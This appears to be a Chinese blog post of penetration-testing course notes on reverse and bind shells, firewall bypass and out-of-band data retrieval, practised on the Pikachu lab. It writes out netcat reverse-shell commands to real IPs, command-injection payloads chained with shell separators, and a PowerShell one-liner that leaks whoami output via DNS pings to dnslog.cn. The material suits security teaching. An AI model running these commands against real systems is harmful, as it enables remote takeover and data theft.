05基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

已于 2024-07-20 12:20:10 修改
阅读量4 收藏
点赞数
分类专栏: 网络安全 文章标签: linux windows
于 2023-10-19 11:59:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52973401/article/details/133865794
版权

1、渗透命令-常规命令&文件上传下载

2、反弹Shell-防火墙策略&正反向连接

3、数据回显-查询带外&网络协议层级

#常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

#实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

那反弹 Shell 是啥呢?其英文名叫做 Reverse Shell,具体干什么的呢?就是控制端首先监听某个 TCP/UDP 端口,然后被控制端向这个端口发起一个请求,同时将自己命令行的输入输出转移到控制端,从而控制端就可以输入命令来控制被控端了。

反弹shell就是把目标主机的权限弹到攻击方的端口

命令生成:https://forum.ywhack.com/shell.php

1、正向连接:本地监听等待对方连接

Linux控制Windows

//绑定CMD到本地5566端口

nc -e cmd -lvp 5566

//主动连接目标5566

ncat 47.122.23.131 5566

Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

//主动连接目标5566

nc 47.94.236.117 5566

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接

nc -lvvp 5566

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566   (对方linux  ip  47.94.236.117  )

//等待5566连接

ncat -lvvp 5566

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->         |    &     ||     &&

Linux->        ;       |     ||     &      &&     ``(特有``和;)

例子:pikachu

ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 `whoami`

1、判断windows

2、windows没有自带的nc

3、想办法上传nc 反弹权限

4、反弹

查看端口 netstat -an

开启入站策略,采用反向连接

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

入站禁止端口 5566

入站禁止5566端口,不一定反弹成功,需要添加入站规则。

正反向反弹案例-内网服务器 只能内网主动交出数据,反向连接

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

pikachu(靶场注释输出显示代码)

无会显

出站入站都开启策略(数据不回显):OSI网络七层

127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z

漏洞有,但是数据不回显:

1、反弹shell

2、带外查询  主动把结果给出来

dnslog(linux)

确定能执行命令

dnslog(windows)

应为有‘\’不能ping通,需要替换

为什么要这样写

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

结果带有“\” 导致ping无法执行

powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

啦啦嘿呀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
uni-app 富文本编辑 回显富文本和修改富文本!
11-21
uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
反弹shell&数据不回显带外查询&pikaqiu靶场搭建
fencecat的博客
03-04 1191
解决无图形化:当我们想下载一个文件时,通常是通过浏览器的一个链接直接访问网点击下载的,但是在实际的安全测试中,我们获取的权限只是一个执行命令的窗口,无法获取图形化界面,因此,我们就需要命令来实现文件的上传和下载。比如,当我们想上传一个文件到对方的服务器,我们应该想办法用命令让对方执行下载操作,而不可能直接打开对方的服务器的浏览器去下载,因为我们没有获取这样的权限,只能通过黑窗窗输入命令尝试。Windows->| & || &&Linux->; | || & && ``(特有``和;)
第五天:反弹shell&不回显带外&正反向链接&文件下载
qq_40245143的博客
12-02 439
1、判断windows2、windows没有自带的nc3、想办法上传nc 反弹权限4、反弹开启入策略,采用反向连接开启出策略,采用正向连接正反反弹案例-内网服务器只能内网主动交出数据,反向连接
反弹shell和DNS外带
十一.的博客
10-24 170
【代码】反弹shell
基础入门-反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
今天是几号的博客
03-08 1162
ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上。NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。为什么开启防火墙后 whoami数据还是可以带外回显? ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层, 但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。
第5天:基础入门-反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
IceCream的博客
04-03 1893
常规基本渗透命令详解:https://blog.csdn.net/weixin_43303273/article/details/83029138名词介绍:https://www.cnblogs.com/sunny11/p/13583083.html反弹shell命令生成:https://forum.ywhack.com/bountytips.php?download文件下载:https://forum.ywhack.com/bountytips.php?download**为什么使用命令下载:**文件的上
反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
siu~
08-29 689
反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
005-基础入门-反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
wushangyu32335的博客
01-13 946
小迪安全2023笔记
Day05反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
qq_61553520的博客
02-27 979
小迪安全-Day05反弹SHELL&不回显带外&正反连接&防火墙出入&文件下载
华为 NE05E&NE08E V300R003C10SPC500 特性描述 - 基础配置 用户登录
04-18
【华为 NE05E&NE08E V300R003C10SPC500 特性描述 - 基础配置 用户登录】章节主要介绍了两种远程登录方式,即Telnet和SSH,这两种方法常用于管理华为的中端路由器NE05E和NE08E。 **3.1 Telnet** - **3.1.1 Telnet ...
S7700-V200R021C00SPC100-SRUE&H&K.cc
05-23
S7700-V200R021C00SPC100-SRUE&H&K.cc S7700-V200R021SPH012-MCUA&SRUA&SRUB.pat 使用前需要查看交换机display version命令回显中的Board Type是否匹配。
vue-amap根据地址回显地图并mark的操作
01-22
实现了地图选址功能后,现在来实现一个根据地址回显地图并标记的功能,效果图如下: 直接上代码: main.js中引入 import Vue from 'vue' import VueAMap from 'vue-amap' import App from './App' import router ...
Linux中的环境变量
qhy850716的博客
07-17 523
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
定制 Linux 内核的意义
地球空间
07-17 309
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
最新发布
Starry的博客
07-19 1182
COD 原理,CTRL9,自检(详细代码示例)
Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4293
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
Linux 权限
includemainprinf的博客
07-18 648
Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 356
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
el-radio-group 不回显
04-11
el-radio-group 是 Element UI 中的一个单选框组件,用于实现单选功能。当你选择一个选项时,其他选项会自动取消选择。el-radio-group 默认会回显选中的选项,如果你遇到不回显的情况,可能是由于以下原因: 1. 未正确绑定 v-model:确保 el-radio-group 组件正确绑定了 v-model 属性,并且 v-model 的值与选项的 value 属性相匹配。 2. 选项的 value 值不匹配:检查 el-radio-group 中的选项的 value 值是否与 v-model 的值相匹配。如果不匹配,选项将无法回显。 3. 数据初始化问题:如果你在 el-radio-group 渲染之前就设置了 v-model 的值,可能会导致不回显。可以尝试在组件渲染完成后再设置 v-model 的值。 如果以上方法都没有解决问题,可以提供更多的代码或详细描述,以便我能够更好地帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值